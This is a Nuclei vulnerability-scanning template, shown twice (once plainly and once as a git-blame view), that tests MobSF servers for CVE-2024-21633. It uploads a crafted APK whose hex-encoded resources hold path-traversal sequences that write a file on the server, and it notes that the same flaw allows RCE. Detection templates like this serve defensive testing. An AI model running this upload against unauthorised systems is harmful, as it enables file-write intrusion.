nuclei-templates/http/vulnerabilities/mobsf/mobsf-apktool-lfi.yaml

id: mobsf-apktool-lfi

info:
  name: MobSF - Path Traversal
  author: Will Mccardell
  severity: high
  description: |
    MobSF is vulnerable to an issue with apktool (CVE-2024-21633) that allows for RCE or arbitrary file writing. It does this through a path traversal vulnerability. This template tests for it by writing to a local file and reading that file. RCE can be achieved by overwriting jadx, as shown in the two POCs listed as references. The payload for this template exists inside the binary format of an APK, which is a zip file. This means that a hardcoded random hex string is checked for, rather than a standard dynamic random string.
  impact: |
    Successful exploitation of the RCE version of this vulnerability can lead to unauthorized access to the MobSF instance, which could leak private intellectual property or deny access to part of the application.
  remediation: |
    To remediate this vulnerability, upgrade MobSF to at least version 3.9.7. This version includes the fix for CVE-2024-21633.
  reference:
    - https://github.com/0x33c0unt/CVE-2024-21633/tree/main?tab=readme-ov-file
    - https://www.qu35t.pw/posts/2024-21633-mobsf-rce/
    - https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/19c1b55c2c59596f2d43439926c9dc976cbeaec4
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21633
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 7.8
    cve-id: CVE-2024-21633
    cwe-id: CWE-22
    cpe: cpe:2.3:a:apktool:apktool:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    verified: true
    vendor: mobsf_project
    product: mobile-security-framework
    fofa-query: title="MobSF"
  tags: cve,cve2024,mobsf,intrusive,rce,lfi

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /upload/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBHBsnUK0pDAzKttf
        X-CSRFToken: {{csrf_token}}

        ------WebKitFormBoundaryBHBsnUK0pDAzKttf
        Content-Disposition: form-data; name="file"; filename="poc.apk"
        Content-Type: application/vnd.android.package-archive

        {{hex_decode('504b03040a00000800009badf658ef61a43018030000180300000e0000007265736f75726365732e6172736302000c00180300000100000001001c00480000000200000000000000000100002400000000000000000000000f0000000c0c66616b6561706b2d736c696d0012127265732f7261772f6861636b65642e7478740000022001c40200007f00000063006f006d002e006e00750063006c0065006900740065006d0070006c006100740065002e00660061006b006500610070006b005f0073006c0069006d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200100000000000060010000000000000000000001001c004000000002000000000000000000000024000000000000000000000010000000060073007400720069006e006700000003007200610077000000000001001c006c0000000200000000000000000100002400000000000000000000000b00000008086170705f6e616d650037372e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e4d6f6253462f646f776e6c6f6164732f6d6f6273662d6376652d323032342d3231363333000000000202100014000000010000000100000000000040010254006800000001000000010000005800000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800020000000000080000030000000002021000140000000200000001000000000000000102540068000000020000000100000058000000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000010000000800000301000000504b03041400080808009badf658000000000000000000000000120000007265732f7261772f6861636b65642e7478740dcf370103410c00b03d68dc7d86e3ca1f421e800649765dbb2403506f5fd03e6ccac876cdc9979d75efbc041cacd5ccf76a986b9f288c79f2d139b11cf4f0739ed5db3531e1911add214e3c6a0a6ddf84c9ea52a24e21389ac0bcbed53272781d15308ad392abf970fc68136b2f2f1983404dc1059892dc55c8e7eed678c3476c5fd477e11eef8f0ba2414cbcd496423299b2a85bb7fefd01504b07081322908e9900000001010000504b03041400080808009badf65800000000000000000000000013000000416e64726f69644d616e69666573742e786d6c9593c16ed3401086ff8d13629a36a4a14845544242880382a4481c508f50718a3880c41148138746b143643bd05b7be039106f0047c4c3f000bc047cbbd934c62512acf57b67fff9776676c70e14eab02619ede976205dd36acc0a7613dc034fc11bf0117c02dfc00f5035d20138043df00a9c80efa05d91ee804720069f414db1fa3a52c42c6d29d15853bdd05013bd844d95c1bc83931a7aff07f384f710e6a2e7193113e76929c74ef59655be366e9fec31ab0f7a8c3d403377a76ea0b2d60c5fcafe4ccf79db4ab78971829d3a7dee32e644b475f4988fd05ad5809d09fbc7ec8ad6e4bffe0faae559a7e7270bf4401ded6355b01e32d7f14d51a568c7cc8b93d9ea63d6035fe122e74d9fb3c36a8e6df38ef147ae8ed86923bc23ac09968d33d16beab1b11222dcd5319a1cfe405d9e8c28c76e7f1fbb53aaa5e3f3757da42e9e085df742cda18b306535728adc9d6ce6fbd2779d9476cfab1cb9de24746eeeee6fb8e6e6fe67cfeafb095164ae8efbc0f6453a33a1bb772363362bc6dc007b6006cec097c0989f5563d29a3119906991dbeaa55f8c4de62bb66ff05f0bbc1d2dec1d9ebaffdf9ccefb433e67e3397e516db8fa146c782e2ce86e79eeb2fb0a16ba86f76ffbffd8724dcfb54b7bad7db5c0357dbd3d5fd7b2de1d5f6fa550af29ecdbf55cb5143ff077528e6573e48533dbb1e573540b39b48a473a736ab9da8a6bdbd97297fec2d50b9c0ab5947306a5be2dfb63d6f4f337504b070810fa89ae1b02000044050000504b03041400080808009badf658000000000000000000000000240000006b6f746c696e2f72616e6765732f72616e6765732e6b6f746c696e5f6275696c74696e73c554db72db4418d64ab2b45a9fb66ee238a74675a031a1842405ea86d324c1334e68a1938412669801d5dec49aca929194d36d67608617283c010fd02b5e006eb8e05df2001dfe5dad1537a4695acad433fabf3dfe87efffbc8aa2688aa22025f999e489458c0741ecb93e3142c7df651129ae769cf06e18ec862c8adcc027d66ad0ed393e1f6acbfe1129ee844177d50b22d6dee0570811373763278c89ce6f132c561a7e9be851cc7a445bf363926d059ec75a31388a085e8b59e8dcf718c944e2628ef9ed35bfe5ed45ee3e2ceeb86104de3c07acc17ed873bc88982b41e031c7279920ee3088d271a2ce6ad066c474a346b7171f11ec72b77110921c4f64ad3fc371b01987aebf4b0c8923a7ca4c8fe6765cdff11a1eeb3248da84185fb04348c5e716732b4ab4b84deacf34eedcddfa86640739c97dd96
        ------WebKitFormBoundaryBHBsnUK0pDAzKttf--

      - |
        GET /static_analyzer/?name=poc.apk&checksum={{appchecksum}}&type=apk HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /download/mobsf-cve-2024-21633.txt HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf_token
        part: body
        internal: true
        group: 1
        regex:
          - '<input\stype="hidden"\sname="csrfmiddlewaretoken"\svalue="(.*?)">'

      - type: json
        name: appchecksum
        part: body
        internal: true
        json:
          - ".hash"

    matchers-condition: and
    matchers:
      - type: word
        part: body_4
        words:
          - "4acbfc74a3002cecf92e81c2a9ac75ada8acabf8f7b40706c5667efbd33be8450d67a3f2f7234f0cd3873de5fee64643d4bd5ed23a1f2c295c7ea0dabcb522ca420f2d91afcfe5b62708c9b90d51dc4ae5a81d7f2ea1befafa31920565074032a2775427dfffe63e97d46e89bcec3cd7ca81411609d98a5c4b1264db69bfe76c"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b6bb2150a2cfa4a0abee35ab118acdf1390f678f1563660e2962add43653b2da02201bd4ba2e672907185b406abb6c0572a0b79f385262df3085ebd5e6b62b9def65:922c64590222798bb761d5b6d8e72950
Revert "Update and rename mobsf-apktool-rce-lfi.yaml to CVE-2024-21633.yaml" This reverts commit 1fe7ebf824e94c5dbed6c411b56b07e4ef0acd9d. 2024-08-28 03:11:09 +00:00			`id: mobsf-apktool-lfi`
Added template to check if a MobSF Instance is vulnerable to CVE-2024-21633 2024-07-24 00:10:36 +00:00
			`info:`
Revert "Update and rename mobsf-apktool-rce-lfi.yaml to CVE-2024-21633.yaml" This reverts commit 1fe7ebf824e94c5dbed6c411b56b07e4ef0acd9d. 2024-08-28 03:11:09 +00:00			`name: MobSF - Path Traversal`
Added template to check if a MobSF Instance is vulnerable to CVE-2024-21633 2024-07-24 00:10:36 +00:00			`author: Will Mccardell`
			`severity: high`
			`description: \|`
Fixed white space issues and ran through yamllint to validate 2024-07-24 20:39:08 +00:00			MobSF is vulnerable to an issue with apktool (CVE-2024-21633) that allows for RCE or arbitrary file writing. It does this through a path traversal vulnerability. This template tests for it by writing to a local file and reading that file. RCE can be achieved by overwriting jadx, as shown in the two POCs listed as references. The payload for this template exists inside the binary format of an APK, which is a zip file. This means that a hardcoded random hex string is checked for, rather than a standard dynamic random string.
Added template to check if a MobSF Instance is vulnerable to CVE-2024-21633 2024-07-24 00:10:36 +00:00			`impact: \|`
			`Successful exploitation of the RCE version of this vulnerability can lead to unauthorized access to the MobSF instance, which could leak private intellectual property or deny access to part of the application.`
			`remediation: \|`
			`To remediate this vulnerability, upgrade MobSF to at least version 3.9.7. This version includes the fix for CVE-2024-21633.`
			`reference:`
			`- https://github.com/0x33c0unt/CVE-2024-21633/tree/main?tab=readme-ov-file`
			`- https://www.qu35t.pw/posts/2024-21633-mobsf-rce/`
			`- https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/19c1b55c2c59596f2d43439926c9dc976cbeaec4`
updated matcher and info 2024-08-28 02:10:15 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2024-21633`
Added template to check if a MobSF Instance is vulnerable to CVE-2024-21633 2024-07-24 00:10:36 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
			`cvss-score: 7.8`
			`cve-id: CVE-2024-21633`
			`cwe-id: CWE-22`
			`cpe: cpe:2.3:a:apktool:apktool::::::::`
			`metadata:`
Update and rename mobsf-apktool-rce-lfi.yaml to CVE-2024-21633.yaml 2024-08-28 03:05:13 +00:00			`max-request: 4`
Revert "Update and rename mobsf-apktool-rce-lfi.yaml to CVE-2024-21633.yaml" This reverts commit 1fe7ebf824e94c5dbed6c411b56b07e4ef0acd9d. 2024-08-28 03:11:09 +00:00			`verified: true`
			`vendor: mobsf_project`
			`product: mobile-security-framework`
updated matcher and info 2024-08-28 02:10:15 +00:00			`fofa-query: title="MobSF"`
Added template to check if a MobSF Instance is vulnerable to CVE-2024-21633 2024-07-24 00:10:36 +00:00			`tags: cve,cve2024,mobsf,intrusive,rce,lfi`

			`http:`
			`- raw:`
Fixed white space issues and ran through yamllint to validate 2024-07-24 20:39:08 +00:00			`- \|`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`
updated matcher and info 2024-08-28 02:10:15 +00:00
Fixed white space issues and ran through yamllint to validate 2024-07-24 20:39:08 +00:00			`- \|`
			`POST /upload/ HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBHBsnUK0pDAzKttf`
			`X-CSRFToken: {{csrf_token}}`
Added template to check if a MobSF Instance is vulnerable to CVE-2024-21633 2024-07-24 00:10:36 +00:00
Fixed white space issues and ran through yamllint to validate 2024-07-24 20:39:08 +00:00			`------WebKitFormBoundaryBHBsnUK0pDAzKttf`
Revert "Update and rename mobsf-apktool-rce-lfi.yaml to CVE-2024-21633.yaml" This reverts commit 1fe7ebf824e94c5dbed6c411b56b07e4ef0acd9d. 2024-08-28 03:11:09 +00:00			`Content-Disposition: form-data; name="file"; filename="poc.apk"`
Fixed white space issues and ran through yamllint to validate 2024-07-24 20:39:08 +00:00			`Content-Type: application/vnd.android.package-archive`
Added template to check if a MobSF Instance is vulnerable to CVE-2024-21633 2024-07-24 00:10:36 +00:00
Fixed white space issues and ran through yamllint to validate 2024-07-24 20:39:08 +00:00			{{hex_decode('504b03040a00000800009badf658ef61a43018030000180300000e0000007265736f75726365732e6172736302000c00180300000100000001001c00480000000200000000000000000100002400000000000000000000000f0000000c0c66616b6561706b2d736c696d0012127265732f7261772f6861636b65642e7478740000022001c40200007f00000063006f006d002e006e00750063006c0065006900740065006d0070006c006100740065002e00660061006b006500610070006b005f0073006c0069006d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200100000000000060010000000000000000000001001c004000000002000000000000000000000024000000000000000000000010000000060073007400720069006e006700000003007200610077000000000001001c006c0000000200000000000000000100002400000000000000000000000b00000008086170705f6e616d650037372e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e4d6f6253462f646f776e6c6f6164732f6d6f6273662d6376652d323032342d3231363333000000000202100014000000010000000100000000000040010254006800000001000000010000005800000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800020000000000080000030000000002021000140000000200000001000000000000000102540068000000020000000100000058000000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000010000000800000301000000504b03041400080808009badf658000000000000000000000000120000007265732f7261772f6861636b65642e7478740dcf370103410c00b03d68dc7d86e3ca1f421e800649765dbb2403506f5fd03e6ccac876cdc9979d75efbc041cacd5ccf76a986b9f288c79f2d139b11cf4f0739ed5db3531e1911add214e3c6a0a6ddf84c9ea52a24e21389ac0bcbed53272781d15308ad392abf970fc68136b2f2f1983404dc1059892dc55c8e7eed678c3476c5fd477e11eef8f0ba2414cbcd496423299b2a85bb7fefd01504b07081322908e9900000001010000504b03041400080808009badf65800000000000000000000000013000000416e64726f69644d616e69666573742e786d6c9593c16ed3401086ff8d13629a36a4a14845544242880382a4481c508f50718a3880c41148138746b143643bd05b7be039106f0047c4c3f000bc047cbbd934c62512acf57b67fff9776676c70e14eab02619ede976205dd36acc0a7613dc034fc11bf0117c02dfc00f5035d20138043df00a9c80efa05d91ee804720069f414db1fa3a52c42c6d29d15853bdd05013bd844d95c1bc83931a7aff07f384f710e6a2e7193113e76929c74ef59655be366e9fec31ab0f7a8c3d403377a76ea0b2d60c5fcafe4ccf79db4ab78971829d3a7dee32e644b475f4988fd05ad5809d09fbc7ec8ad6e4bffe0faae559a7e7270bf4401ded6355b01e32d7f14d51a568c7cc8b93d9ea63d6035fe122e74d9fb3c36a8e6df38ef147ae8ed86923bc23ac09968d33d16beab1b11222dcd5319a1cfe405d9e8c28c76e7f1fbb53aaa5e3f3757da42e9e085df742cda18b306535728adc9d6ce6fbd2779d9476cfab1cb9de24746eeeee6fb8e6e6fe67cfeafb095164ae8efbc0f6453a33a1bb772363362bc6dc007b6006cec097c0989f5563d29a3119906991dbeaa55f8c4de62bb66ff05f0bbc1d2dec1d9ebaffdf9ccefb433e67e3397e516db8fa146c782e2ce86e79eeb2fb0a16ba86f76ffbffd8724dcfb54b7bad7db5c0357dbd3d5fd7b2de1d5f6fa550af29ecdbf55cb5143ff077528e6573e48533dbb1e573540b39b48a473a736ab9da8a6bdbd97297fec2d50b9c0ab5947306a5be2dfb63d6f4f337504b070810fa89ae1b02000044050000504b03041400080808009badf658000000000000000000000000240000006b6f746c696e2f72616e6765732f72616e6765732e6b6f746c696e5f6275696c74696e73c554db72db4418d64ab2b45a9fb66ee238a74675a031a1842405ea86d324c1334e68a1938412669801d5dec49aca929194d36d67608617283c010fd02b5e006eb8e05df2001dfe5dad1537a4695acad433fabf3dfe87efffbc8aa2688aa22025f999e489458c0741ecb93e3142c7df651129ae769cf06e18ec862c8adcc027d66ad0ed393e1f6acbfe1129ee844177d50b22d6dee0570811373763278c89ce6f132c561a7e9be851cc7a445bf363926d059ec75a31388a085e8b59e8dcf718c944e2628ef9ed35bfe5ed45ee3e2ceeb86104de3c07acc17ed873bc88982b41e031c7279920ee3088d271a2ce6ad066c474a346b7171f11ec72b77110921c4f64ad3fc371b01987aebf4b0c8923a7ca4c8fe6765cdff11a1eeb3248da84185fb04348c5e716732b4ab4b84deacf34eedcddfa86640739c97dd96
			`------WebKitFormBoundaryBHBsnUK0pDAzKttf--`
updated matcher and info 2024-08-28 02:10:15 +00:00
Fixed white space issues and ran through yamllint to validate 2024-07-24 20:39:08 +00:00			`- \|`
Revert "Update and rename mobsf-apktool-rce-lfi.yaml to CVE-2024-21633.yaml" This reverts commit 1fe7ebf824e94c5dbed6c411b56b07e4ef0acd9d. 2024-08-28 03:11:09 +00:00			`GET /static_analyzer/?name=poc.apk&checksum={{appchecksum}}&type=apk HTTP/1.1`
Fixed white space issues and ran through yamllint to validate 2024-07-24 20:39:08 +00:00			`Host: {{Hostname}}`
updated matcher and info 2024-08-28 02:10:15 +00:00
Fixed white space issues and ran through yamllint to validate 2024-07-24 20:39:08 +00:00			`- \|`
			`GET /download/mobsf-cve-2024-21633.txt HTTP/1.1`
			`Host: {{Hostname}}`
Added template to check if a MobSF Instance is vulnerable to CVE-2024-21633 2024-07-24 00:10:36 +00:00
			`extractors:`
			`- type: regex`
			`name: csrf_token`
			`part: body`
			`internal: true`
			`group: 1`
			`regex:`
			`- '<input\stype="hidden"\sname="csrfmiddlewaretoken"\svalue="(.*?)">'`
updated matcher and info 2024-08-28 02:10:15 +00:00
Added template to check if a MobSF Instance is vulnerable to CVE-2024-21633 2024-07-24 00:10:36 +00:00			`- type: json`
			`name: appchecksum`
			`part: body`
			`internal: true`
			`json:`
			`- ".hash"`
Fixed white space issues and ran through yamllint to validate 2024-07-24 20:39:08 +00:00
Added template to check if a MobSF Instance is vulnerable to CVE-2024-21633 2024-07-24 00:10:36 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
updated matcher and info 2024-08-28 02:10:15 +00:00			`part: body_4`
Added template to check if a MobSF Instance is vulnerable to CVE-2024-21633 2024-07-24 00:10:36 +00:00			`words:`
Fixed white space issues and ran through yamllint to validate 2024-07-24 20:39:08 +00:00			`- "4acbfc74a3002cecf92e81c2a9ac75ada8acabf8f7b40706c5667efbd33be8450d67a3f2f7234f0cd3873de5fee64643d4bd5ed23a1f2c295c7ea0dabcb522ca420f2d91afcfe5b62708c9b90d51dc4ae5a81d7f2ea1befafa31920565074032a2775427dfffe63e97d46e89bcec3cd7ca81411609d98a5c4b1264db69bfe76c"`
Added template to check if a MobSF Instance is vulnerable to CVE-2024-21633 2024-07-24 00:10:36 +00:00
			`- type: status`
			`status:`
			`- 200`
chore: sign templates 🤖 2024-08-28 23:42:01 +00:00			`# digest: 4a0a00473045022100b6bb2150a2cfa4a0abee35ab118acdf1390f678f1563660e2962add43653b2da02201bd4ba2e672907185b406abb6c0572a0b79f385262df3085ebd5e6b62b9def65:922c64590222798bb761d5b6d8e72950`